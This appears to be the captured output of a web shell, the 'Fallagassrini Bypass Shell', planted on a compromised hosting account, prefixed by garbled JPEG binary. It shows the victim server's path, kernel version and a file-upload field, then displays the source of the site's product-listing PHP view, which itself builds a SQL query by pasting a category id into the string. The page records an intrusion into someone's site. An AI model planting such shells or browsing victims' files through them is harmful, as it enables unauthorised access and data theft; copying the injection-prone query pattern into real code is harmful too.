JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/jpewexports/public_html/application/views/

Linux 43-225-53-84.webhostbox.net 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01 UTC 2023 x86_64
Upload File :
Current File : /home/jpewexports/public_html/application/views/featured_products.php

	<div class="moduletable  sp-deal">

            
        		  <div class="module-title">
			 <h3>
				<span>Featured Products</span>
			 </h3>
		  </div>
        
        <!--<div class="page-title-slider">Hot Deals</div>-->

                                                    <div id="sp_deal_1" class="sp-deal sp-preload" style="margin-bottom:40px;">
                <div class="sp-loading"></div>

                                                <div class="slider not-js cols-6 preset01-4 preset02-3 preset03-2 preset04-1">
                    <div class="vpo-wrap">
                        <div class="vp">
                            <div class="vpi-wrap tt-effect-slide tt-effect-delay">
					
							<?php
$fpr=$this->db->query("select * from products where featured='1' order by id desc");
$fpr_count=$fpr->num_rows();
if($fpr_count!=0)
{		
$fprd=$fpr->result_array();			
foreach($fprd as $fpd2) { 
	if(isset($fpd2['title'])) { $ptitle=$fpd2['title'];  } else { $ptitle=''; }
	if(isset($fpd2['main_image'])) { $pmimage=$fpd2['main_image'];  } else { $pmimage=''; }
	if(isset($fpd2['new_price'])) { $pnprice=$fpd2['new_price'];  } else { $pnprice=''; }
	if(isset($fpd2['old_price'])) { $poprice=$fpd2['old_price'];  } else { $poprice=''; }
	if(isset($fpd2['description'])) { $pdescription=$fpd2['description'];  } else { $pdescription=''; }
	if(isset($fpd2['rating'])) { $prating=$fpd2['rating'];  } else { $prating=''; }
	
	
	$pr_cats=$this->db->query("select * from categories where id='".$fpd2['category']."'");
									$pr_catr=$pr_cats->row_array();
									
									$nmc=$pr_catr['category'];
								    $name1c=str_replace("-","_",$nmc);
								   $name2c=str_replace(" ","-",$name1c);
								   $name3c=str_replace("(","[",$name2c);
								   $name4c=str_replace(")","]",$name3c);
								   $name6c=str_replace("%","percent",$name4c);
								   $name6c=str_replace("/","+",$name6c);
								   
									$nmd=$ptitle;
								    $name1d=str_replace("-","_",$nmd);
								   $name2d=str_replace(" ","-",$name1d);
								   $name3d=str_replace("(","[",$name2d);
								   $name4d=str_replace(")","]",$name3d);
								   $name6d=str_replace("%","percent",$name4d);
								   $name6d=str_replace("/","+",$name6d);
								   $name5d=base_url().$name6c."/".$name6d.".html";

	?>
                                                                  <div class="item">
                                        <div class="item-wrap clearfix">
                                                <div class="item-img item-height">
												
																								<div class="new-box">
										<span class="new-label">New</span>
									</div>
															
														<!--								<div class="price-percent-reduction"><span>-15%</span></div>
							-->
							
															<div class="item-img-info " style="text-align:center;">
									<a class="product_img_link"
									   href="<?php echo $name5d; ?>"
									   title=""  >
													<?php if($pmimage!='') { ?>
							<img  class="img_1" style="width: auto !important;"  src="<?php echo base_url(); ?>uploads/large/<?php echo $pmimage; ?>"  alt="" />
							<?php } ?>
							<?php if($pmimage!='') { ?>
							<img  class="img_0" style="width: auto !important;"   src="<?php echo base_url(); ?>uploads/large/<?php echo $pmimage; ?>"  alt="" />
							<?php } ?>
																			</a>
									
									
									
									
								</div>
								
														
																
							                                                </div>
                                            
											
											<div class="item-info">
                                                <div class="item-inner">
						    	<div class="comments_note" itemprop="aggregateRating" itemscope itemtype="">
		<div class="star_content ">
<?php $pr=0;
for($pr=0;$pr<$prating;$pr++) { ?>
		<div class="star"></div>
<?php } ?>
							            <meta itemprop="worstRating" content = "0" />
            <meta itemprop="ratingValue" content = "0" />
            <meta itemprop="bestRating" content = "5" />
		</div>
		<span class="nb-comments"><span itemprop="reviewCount">0</span> Review(s)</span>
	</div>
<div class="item-title">
                                                            <a href="<?php echo $name5d; ?>"                                                              title="">
                                                                <?php echo substr($ptitle,0,20)."..."; ?>
                                                            </a>
                                                        </div>
                                                    													
													
                                                    <div class="item-content">
                                                                                                                                                                                                                                            <div itemprop="offers" itemscope
                                                                     itemtype=""
                                                                     class="content_price">
				<span itemprop="price"
                                                                              class="price product-price">
																			 <?php echo $pnprice; ?>																		</span>
                                                                        <meta itemprop="priceCurrency"
                                                                              content="USD"/>
                                                                                                                                                    
                                                                        <span class="old-price product-price">
																		  <!--?php echo $poprice; ?-->																		
																	</span>
                                                                                                                    </div>
                                                                                                                                                                            
                                                    </div>
													
							                                                            <div class="button-container">
								
</div>
                                                                                                        </div>
                                            </div>
											
                                        </div>
                                    </div>
									
									<?php } } ?>
                                                            

                                                            </div>
                        </div>
                    </div>
                </div>
                                                            <div class="page-button bottom style1">
                            <div class="control-button">
                                <a class="preview"><i class="fa fa-angle-left"></i></a>
                                <a class="next"><i class="fa fa-angle-right"></i></a>
                            </div>
                        </div>
                                                </div>
            <script type="text/javascript">
                //<![CDATA[
                jQuery(document).ready(function ($) {
                    ;
                    (function (element) {
                        var $el = $(element);

                        function runSlider() {
                            $('.slider', $el).responsiver({
                                interval: 0,
                                speed: 800,
                                start: 0,
                                step: 4,
                                circular: true,
                                preload: true,
//                                fx: 'fade',
                                pause: 'hover',
                                control: {
                                    prev: '#sp_deal_1 .control-button a[class="preview"]',
                                    next: '#sp_deal_1 .control-button a[class="next"]'
                                },

                                getColumns: function (_element) {
                                    var match = $(_element).attr('class').match(/cols-(\d+)/);
                                    if (match[1]) {
                                        var column = parseInt(match[1]);
                                    } else {
                                        var column = 1;
                                    }
                                    if (!column) column = 1;
                                    return column;
                                }
                            });
                        }

                        var _timer = 0;
                        $(window).load(function () {
                            if (_timer) clearTimeout(_timer);
                            _timer = setTimeout(function () {
                                runSlider();
                                $('.sp-loading', $el).remove();
                                $el.removeClass('sp-preload');
                            }, 1000);
                        });

                                                $('.slider', $el).touchSwipeLeft(function () {
                                    $('.slider', $el).responsiver('next');
                                }
                        );
                        $('.slider', $el).touchSwipeRight(function () {
                                    $('.slider', $el).responsiver('prev');
                                }
                        );
                        						
						data = new Date(2013,10,26,12,00,00);
					function CountDown(date,id){
						dateNow = new Date();
						amount = date.getTime() - dateNow.getTime();
						if(amount < 0 && $('#'+id).length){
							$('.'+id).html("Now!");
						} else{
							days=0;hours=0;mins=0;secs=0;out="";
							amount = Math.floor(amount/1000);
							days=Math.floor(amount/86400);
							amount=amount%86400;
							hours=Math.floor(amount/3600);
							amount=amount%3600;
							mins=Math.floor(amount/60);
							amount=amount%60;
							secs=Math.floor(amount);
							if(days != 0){
								out += "<div class='time-item time-day'>" + "<div class='num-time'>" + days + "</div>" +" <div class='name-time'>"+((days==1)?"Day":"Days") + "</div>"+"</div> ";
							}
							if(hours != 0){
								out += "<div class='time-item time-hour'>" + "<div class='num-time'>" + hours + "</div>" +" <div class='name-time'>"+((hours==1)?"Hour":"Hours") + "</div>"+"</div> ";
							}
							out += "<div class='time-item time-min'>" + "<div class='num-time'>" + mins + "</div>" +" <div class='name-time'>"+((mins==1)?"Min":"Mins") + "</div>"+"</div> ";
							out += "<div class='time-item time-sec'>" + "<div class='num-time'>" + secs + "</div>" +" <div class='name-time'>"+((secs==1)?"Sec":"Secs") + "</div>"+"</div> ";
							out = out.substr(0,out.length-2);
							$('.'+id).html(out) ;
							/*setTimeout(function(){
								CountDown(date,id);
								},1000);*/
						}
					}	
					if(listdeal.length > 0){
						for(var i=0; i < listdeal.length  ; i++) {
							var arr = listdeal[i].split("|"); 
							
							if (arr[1].length) {
								var data = new Date(arr[1]);
								CountDown(data, arr[0]);
							}			
						}	
					}
                    })('#sp_deal_1')
                });
                //]]>
            </script>
                        </div> 
							
																								
								


bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net